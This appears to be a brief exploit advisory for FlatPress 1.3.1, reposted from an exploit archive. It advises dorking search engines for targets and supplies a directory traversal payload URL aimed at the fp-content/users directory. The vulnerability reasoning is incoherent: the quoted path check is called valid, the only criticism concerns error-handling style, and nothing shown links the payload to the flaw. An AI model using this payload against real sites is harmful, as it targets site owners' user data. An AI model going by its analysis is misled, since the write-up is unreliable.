Share
## https://sploitus.com/exploit?id=PACKETSTORM:180147
=============================================================================================================================================  
| # Title : FlatPress 1.3.1 Path Validation Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |  
| # Vendor : https://github.com/flatpressblog/flatpress/archive/1.3.1.zip |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking İn Google Or Other Search Enggine.  
  
[+] infected item : /flatpress-1.3.1/fp-includes/core/core.config.php  
  
if ($fullpath[0] != '/')  
trigger_error('config_read: syntax error. Path must begin with a /');  
  
[+] This line checks if the path starts with /. If it doesn’t, it triggers an error using trigger_error.   
While this is valid, it might be better to use an InvalidArgumentException for more robust error handling.  
  
[+] use payload : /fp-includes/core/core.config.php/path=../../../../../fp-content/users/  
  
[+] http://127.0.0.1/flatpress-1.3.1/fp-includes/core/core.config.php/path=../../../../../fp-content/users/  
  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================